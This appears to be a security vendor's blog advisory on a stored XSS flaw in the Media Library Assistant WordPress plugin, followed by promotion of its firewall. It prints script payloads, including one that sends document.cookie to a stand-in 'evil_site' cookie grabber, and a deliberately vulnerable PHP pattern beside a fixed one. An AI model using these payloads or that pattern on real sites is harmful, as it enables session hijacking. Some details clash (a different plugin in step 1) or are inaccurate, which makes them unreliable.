Cross-site scripting flaw in WordPress plugin Media Library Assistant

Internet traffic is rising rapidly. Users like things that require less effort, and with quality work, WordPress is part of this. WordPress was introduced in 2003, and millions of WordPress websites have been hosted since. Since WordPress is a fixed website building block, each site has its own purpose, and we always try to make it distinct from other websites not just by content but by structure. We have tried a lot of themes and plugins to attach additional functionality to WordPress-based sites, but are you sure the plugin is secure for your website and not vulnerable? Security is a vital part of website development: with content, ads, user requirements and SEO you can make your website the best, but it also has to be protected. miniOrange investigates the behavior of requests and blocks harmful IPs before they reach your site.


The Cross-site scripting (XSS) vulnerability in Media Library Assistant (version 2.8):


Media is a tab in the WordPress administrator sidebar that is used to manage user uploads (images, audio, video, and other files). Under the Media menu there are two screens. The first screen, Library, lists all the files in the media library; these files can be edited and deleted from the library. The second screen, Add New, lets users upload files. Recall that users can also upload media (images, videos, and so on) while composing a post or page. However, the Add New link under Media lets users upload files without attaching them to a particular post or page.

The Media Library Assistant provides several enhancements for managing the Media Library, including several shortcodes that can be used in the post, page, or custom post type to add a gallery of images and/or other Media Library items (such as PDF documents).



miniOrange found an authenticated stored XSS flaw in the Media Library Assistant plugin. XSS is all about injecting malicious code, and in this case it is injected through an input field. The attacker enters a malicious script to steal all user information from a low-privilege account by inserting a script in the title of the image.



Proof of Concept:


  1. Local instance of the site with the Envira Photo Gallery plugin installed:




  2. Now open the Settings tab and find the Media/Assistant Screen Options.
    Here you will find the Menu title field: this is an XSS-injectable object. Malicious code injected here affects the entire user dashboard across the user platform.



  3. Now enter the malicious code in the Menu title and save the changes.




    Once the changes are saved, the injection is in effect.




    Code used in the Menu title to attack the users with this plugin installed on the same instance:



    <script type="text/javascript"> window.onload = function(){ window.open("https://www.google.com", "_blank"); alert(document.cookie) } </script>

    <script type="text/javascript"> document.location= "http://evil_site/dashboard/de/cookiegraber.php?c=" + document.cookie; </script>

    After the script is injected in the title and the settings are updated, the attacker has successfully stored XSS on the site, and every user visiting any part of the site will be affected. This is highly dangerous because the victim does not even have to go to the plugin dashboard: the code is executed as soon as the user logs in to the instance.

  4. Effects of the injection on the site:


    Let's say a different user logs into the instance remotely; they will be affected by the stored XSS right after logging in.



The Cross-site scripting (XSS) attack on a WordPress site:


Vulnerabilities in a WordPress site enable attackers to inject malicious scripts under the guise of a trustworthy individual and force the user to perform malicious activities. There is no way for the browser to verify whether the script is coming from a trusted source. In WordPress, we may attach additional functionality to sites through plugins, but even excellent services have drawbacks. After plugin activation, the plugin not only reads the website parameters but also adds its own input fields, and those input fields are a frequent source of vulnerabilities. That list of input fields includes site search, comment forms, contact forms, login pages, and so on. The real security measure is applied to these input fields, because attackers exploit vulnerabilities in input fields to add malicious code to the site.
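The code-level root cause and fix for this class of flaw, as an added example that is not the Media Library Assistant plugin's own code: the option name, settings group and function names are assumptions chosen for the illustration. The hardened version stores the setting through the WordPress Settings API with a sanitize callback and escapes the value on output.

```php
<?php
// Added example, not Media Library Assistant code. The option name
// 'example_menu_title', the group 'example_group' and the function
// names are placeholders chosen for this illustration.

/* --- Vulnerable pattern: the submitted title is stored and later
 *     echoed unchanged, so a value containing <script> is served to
 *     every user who loads the admin page. --- */
function example_save_title_unsafe() {
    update_option( 'example_menu_title', $_POST['menu_title'] ); // stored raw
}
function example_render_title_unsafe() {
    echo '<h2>' . get_option( 'example_menu_title' ) . '</h2>';   // echoed raw
}

/* --- Hardened pattern: sanitise on the way in, escape on the way out,
 *     and let the Settings API (options.php) enforce the nonce and the
 *     manage_options capability on save. --- */
function example_register_title_setting() {
    register_setting( 'example_group', 'example_menu_title', array(
        'type'              => 'string',
        // sanitize_text_field() strips tags and control characters
        // before the value reaches the database.
        'sanitize_callback' => 'sanitize_text_field',
        'default'           => 'Media Assistant',
    ) );
}
add_action( 'admin_init', 'example_register_title_setting' );

function example_render_title_safe() {
    $title = get_option( 'example_menu_title', 'Media Assistant' );
    // esc_html() neutralises <, >, &, " and ' in element content;
    // esc_attr() does the same for the attribute context below.
    echo '<h2>' . esc_html( $title ) . '</h2>';
    echo '<form method="post" action="options.php">';
    settings_fields( 'example_group' );   // nonce + option_page fields
    echo '<input type="text" name="example_menu_title" value="'
        . esc_attr( $title ) . '">';
    submit_button();
    echo '</form>';
}
```

Escaping at output is the control that actually stops the stored payload from running; sanitising on save is defence in depth, since older rows in wp_options may already hold unsanitised values.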



Check out miniOrange WP Security Pro.



How does a Cross-site scripting (XSS) attack impact a WordPress site?


The attacker injects a malicious script, which mainly contains malicious links or programs that are silently installed on the system without user interaction. Sometimes it forces the user to provide additional information. As we know, we do not need to log in again and again: once we log in to a web application, it generates a session cookie, and we can access the application until the session expires. After the cookie is stolen, the intruder is able to reach the user account without a username and password and to view all the applications opened in the same browser.

There are three types of Cross-site Scripting (XSS):

• The reflected cross-site scripting attack is where the malicious script is injected from the client side.

• The persistent cross-site scripting attack is where the malicious script inserted by an attacker is stored in the database, allowing the attacker to possibly retrieve information stored within the database.

• The DOM-based cross-site scripting attack is a client-side attack: the malicious script is executed directly after a legitimate server-side script runs.

How to protect your WordPress site from attackers?


miniOrange provides a security package for your WordPress site. It includes a web application firewall (WAF) to get rid of malicious activity.


miniOrange provides a firewall at two levels:

• Website firewall at the plugin level:

  This activates the WAF after WordPress loads. It blocks illegitimate requests after a connection to WordPress has been made, checking every request in the plugin itself.

• Website firewall at the .htaccess level:

  At this level, the WAF is activated before WordPress loads. It blocks illegitimate requests before any connection to WordPress is made, so illegal requests are blocked before any page is loaded.



The firewall service is enabled on plugin activation. In the free version of WP Security Pro, you get some signatures to protect your WordPress site from cross-site scripting (XSS).



The WAF filters and blocks unauthorized requests directed at the web application and does not allow it to be abused.

Further Details:

https://security.miniorange.com/web-application-firewall-waf/
https://wordpress.org/plugins/wp-security-pro/
https://www.miniorange.com/